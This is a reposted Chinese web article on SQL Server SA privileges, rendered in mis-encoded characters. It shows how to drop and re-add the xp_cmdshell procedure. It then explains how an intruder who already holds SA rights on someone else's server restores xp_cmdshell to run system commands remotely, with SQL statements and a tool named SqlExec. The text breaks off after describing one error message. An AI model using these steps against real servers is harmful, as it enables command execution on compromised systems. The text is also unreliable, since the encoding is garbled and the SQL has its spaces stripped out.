SQL Server SA權(quán)限總結(jié)經(jīng)典技術(shù)
發(fā)布日期:2022-02-04 19:40 | 文章來源:源碼之家
第一部分:
有關(guān)去掉xp_cmdshell來保護系統(tǒng)的分析總結(jié):
首先知道一下語句:
1.去掉xp_cmdshell擴展過程的方法是使用如下語句:
ifexists(select*fromdbo.sysobjectswhereid=object_id(N'[dbo].[xpcmdshell]')andOBJECTPROPERTY(id,N'IsExtendedProc')=1)execsp_dropextendedprocN'[dbo].[xp_cmdshell]'
2.添加xp_cmdshell擴展過程的方法是使用如下語句:
sp_addextendedprocxp_cmdshell,@dllname='xplog70.dll'
現(xiàn)在看看現(xiàn)象:
我們在取得SA權(quán)限后遠程用Sqlexec執(zhí)行cmd命令,出現(xiàn)提示SQL_ERROR,那么很可能是去掉了xp_cmdshell。
現(xiàn)在來看看被去掉xp_cmdshell后恢復(fù)的兩種方法:
方法一、使用SQLQueryAnalyzer連接對方后直接寫入,挺方便sp_addextendedprocxp_cmdshell,@dllname='xplog70.dll'方法二、使用SqlExecSunxVersion首先在SqlExecSunxVersion的Format選項里填上%s,在CMD選項里輸入sp_addextendedproc'xp_cmdshell','xpsql70.dll'或者對Sql2000情況下使用sp_addextendedproc'xp_cmdshell','xplog70.dll'另外使用SqlExecSunxVersion來去除xp_cmdshell的方法和加的時候選擇條件一樣,然后輸入sp_dropextendedproc'xp_cmdshell'就可以了
第二部分:
假如對方已經(jīng)把xplog70.dll刪除或者改了名,我們來用下面的方法繼續(xù)我們的hack任務(wù):
當出現(xiàn)如下現(xiàn)象暗示代表很有可能是xplog70.dll刪除或者改了名。
在查詢分析器中寫入sp_addextendedprocxp_cmdshell,@dllname='xplog70.dll'提示數(shù)據(jù)庫中已存在名為'xp_cmdshell'的對象。
版權(quán)聲明:本站文章來源標注為YINGSOO的內(nèi)容版權(quán)均為本站所有,歡迎引用、轉(zhuǎn)載,請保持原文完整并注明來源及原文鏈接。禁止復(fù)制或仿造本網(wǎng)站,禁止在非www.sddonglingsh.com所屬的服務(wù)器上建立鏡像,否則將依法追究法律責任。本站部分內(nèi)容來源于網(wǎng)友推薦、互聯(lián)網(wǎng)收集整理而來,僅供學習參考,不代表本站立場,如有內(nèi)容涉嫌侵權(quán),請聯(lián)系alex-e#qq.com處理。
相關(guān)文章